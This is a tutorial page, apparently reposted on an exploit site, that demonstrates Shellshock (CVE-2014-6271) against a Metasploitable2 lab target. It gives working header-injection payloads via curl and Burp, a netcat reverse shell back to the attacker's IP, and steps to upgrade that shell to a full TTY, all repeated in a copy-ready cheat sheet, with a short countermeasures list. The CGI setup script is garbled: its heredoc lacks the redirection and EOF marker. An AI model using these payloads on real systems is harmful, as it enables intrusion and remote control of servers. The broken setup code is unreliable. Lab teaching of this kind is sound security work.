Share
## https://sploitus.com/exploit?id=AEDEF1DD-E045-55BD-B842-EBFE5E9A8451
# Exploiting Shellshock (CVE-2014-6271): A Complete, Modern Demonstration Lab

Shellshock (CVE-2014-6271) is one of the most influential remote code execution vulnerabilities ever discovered. The flaw affects Bash and allows attackers to execute arbitrary commands simply by injecting crafted payloads into environment variables.

This guide provides a full, reproducible demonstration using:

* **Kali Linux** (attacker)
* **Metasploitable2** (target)
* **curl**, **Burp Suite**, **Netcat**
* A manually created Bash-based CGI script

It is designed for teaching, research, training, and general cybersecurity awareness.

---

 ## ๐Ÿ“Œ Table of Contents

1. [Lab Architecture](#1-lab-architecture)
2. [Creating the Vulnerable CGI Script](#2-creating-the-vulnerable-cgi-script)
3. [Understanding the Shellshock Vulnerability](#3-understanding-the-shellshock-vulnerability)
4. [Exploiting Shellshock with curl](#4-exploiting-shellshock-with-curl)
5. [Exploiting Shellshock with Burp Suite](#5-exploiting-shellshock-with-burp-suite)
6. [Reverse Shell via Shellshock](#6-reverse-shell-via-shellshock)
7. [Upgrading to a Fully Interactive TTY](#7-upgrading-to-a-fully-interactive-tty)
8. [Attack Chain Diagram](#8-attack-chain-diagram)
9. [Countermeasures](#9-countermeasures)
10. [Cheat Sheet (All Commands)](#10-cheat-sheet-all-commands)
11. [Conclusion](#11-conclusion)


---

# 1. Lab Architecture

| **Component**       | **Role**                 | **OS**              | **IP Address** | **Key Services**               |
| ------------------- | ------------------------ | ------------------- | -------------- | ------------------------------ |
| **Kali Linux**      | Attacker                 | Kali Linux (latest) | `192.168.1.4`  | curl, Burp Suite, Netcat       |
| **Metasploitable2** | Target vulnerable server | Ubuntu Linux (MSF2) | `192.168.1.5`  | Apache 2.2, CGI scripts, Bash  |
| **Apache mod_cgi**  | Script execution         | Runs on MSF2        | n/a            | Exposes Bash via CGI           |
| **shellshock.sh**   | Vulnerable entrypoint    | Bash CGI            | n/a            | Displays environment variables |

This simple two-node setup mirrors many legacy deployments still present in industrial and IoT systems.

---

# 2. Creating the Vulnerable CGI Script

On Metasploitable2:

```bash
sudo su
cd /usr/lib/cgi-bin/

cat  shellshock.sh
#!/bin/bash
echo "Content-type: text/html"
echo
echo ""
env
echo ""
EOF

chmod +x shellshock.sh
a2enmod cgi
service apache2 restart
```

Test the script from Kali:

```bash
curl http://192.168.1.5/cgi-bin/shellshock.sh
```

You should see environment variables displayed.

---

# 3. Understanding the Shellshock Vulnerability

Shellshock occurs when Bash incorrectly parses environment variables that resemble function definitions.

A malicious variable such as:

```
() { :; }; /bin/bash -c "id"
```

will cause Bash to execute the command *after* the function definition โ€” even though the function itself is never invoked.

CGI applications are especially vulnerable because HTTP headers are automatically passed to scripts as environment variables.

---

# 4. Exploiting Shellshock with curl

```bash
curl -H 'User-Agent: () { :; }; echo; echo Vulnerable; /bin/bash -c "id"' \
http://192.168.1.5/cgi-bin/shellshock.sh
```

Output should include:

```
Vulnerable
uid=33(www-data)
```

This confirms **remote code execution**.

---

# 5. Exploiting Shellshock with Burp Suite

### 5.1 Send Normal Request

Visit:

```
http://192.168.1.5/cgi-bin/shellshock.sh
```

Send the request to **Repeater**.

### 5.2 Inject Shellshock Payload

Replace the `User-Agent` header with:

```
User-Agent: () { :; }; echo; echo BurpTest; /bin/bash -c "id"
```

### 5.3 Response

You should see:

```
BurpTest
uid=33(www-data)
```

Burp Suite confirms the vulnerability in a visual and educational way.

---

# 6. Reverse Shell via Shellshock

Start listener on Kali:

```bash
nc -lvnp 4444
```

Trigger reverse shell via the CGI script:

```bash
curl -H 'User-Agent: () { :; }; /bin/bash -c "nc 192.168.1.4 4444 -e /bin/bash"' \
http://192.168.1.5/cgi-bin/shellshock.sh
```

A shell will connect back to Kali.

---

# 7. Upgrading to a Fully Interactive TTY

Inside the reverse shell:

```bash
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
```

Suspend the session:

```
Ctrl + Z
```

On Kali:

```bash
stty raw -echo; fg
```

Press **Enter**.

You now have:

* tab completion
* arrow keys
* job control
* full interactive Bash

---

# 8. Attack Chain Diagram

```text
          โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
          โ”‚     Attacker (Kali)    โ”‚
          โ”‚      192.168.1.4       โ”‚
          โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
                      โ”‚
     1. Malicious HTTP Header (Shellshock)
                      โ”‚
                      โ–ผ
        โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
        โ”‚ Apache Web Server (CGI)  โ”‚
        โ”‚     192.168.1.5          โ”‚
        โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
                    โ”‚
   2. Header โ†’ CGI Environment Variable
                    โ”‚
                    โ–ผ
      โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
      โ”‚     Bash (Vulnerable)    โ”‚
      โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
                  โ”‚
      3. Injected Command Executes
                  โ”‚
                  โ–ผ
        โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
        โ”‚  www-data Shell Access  โ”‚
        โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
                    โ”‚
        4. Reverse Shell โ†’ Kali
                    โ”‚
                    โ–ผ
      โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
      โ”‚ Full Interactive TTY     โ”‚
      โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
```

---

# 9. Countermeasures

### โœ” 1. Upgrade Bash

Patch to a version that correctly handles function parsing.

### โœ” 2. Disable CGI

Legacy CGI introduces unnecessary systemic risk.

### โœ” 3. Sanitise HTTP Headers

Drop suspicious patterns such as:

```
() { :; };
```

### โœ” 4. Use Least Privilege

Restrict web server user (`www-data`) permissions.

### โœ” 5. Outbound Connection Restrictions

Stops reverse shells and data exfiltration.

### โœ” 6. Deploy a Web Application Firewall (WAF)

Modern WAF signatures detect Shellshock immediately.

### โœ” 7. Enable SELinux / AppArmor

Contains Bash processes and blocks unintended behaviour.

### โœ” 8. Run Regular Vulnerability Scans

Use tools such as:

* Nessus
* OpenVAS
* Nikto
* Nmap NSE (http-shellshock.nse)

---

# 10. Cheat Sheet (All Commands)

### **Target Setup**

```bash
sudo su
cd /usr/lib/cgi-bin/
cat  shellshock.sh
#!/bin/bash
echo "Content-type: text/html"
echo
echo ""
env
echo ""
EOF
chmod +x shellshock.sh
a2enmod cgi
service apache2 restart
```

---

### **Test CGI**

```bash
curl http://192.168.1.5/cgi-bin/shellshock.sh
```

---

### **Shellshock Test**

```bash
curl -H 'User-Agent: () { :; }; echo; echo Vulnerable; /bin/bash -c "id"' \
http://192.168.1.5/cgi-bin/shellshock.sh
```

---

### **Reverse Shell**

```bash
nc -lvnp 4444
```

```bash
curl -H 'User-Agent: () { :; }; /bin/bash -c "nc 192.168.1.4 4444 -e /bin/bash"' \
http://192.168.1.5/cgi-bin/shellshock.sh
```

---

### **Upgrade to Full TTY**

Inside shell:

```bash
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
```

Suspend:

```
Ctrl + Z
```

On Kali:

```bash
stty raw -echo; fg
```

Press **Enter**.

---

# 11. Conclusion

This demonstration shows how Shellshock can be exploited using simple HTTP header manipulation, reverse shells, and CGI script execution. Despite being over a decade old, Shellshock remains an important lesson in:

* secure software practices
* input sanitisation
* legacy system risks
* post-exploitation techniques

 
 
---



**Made with lots of love,  
Haitham of Oman โค๏ธ๐Ÿ‡ด๐Ÿ‡ฒ**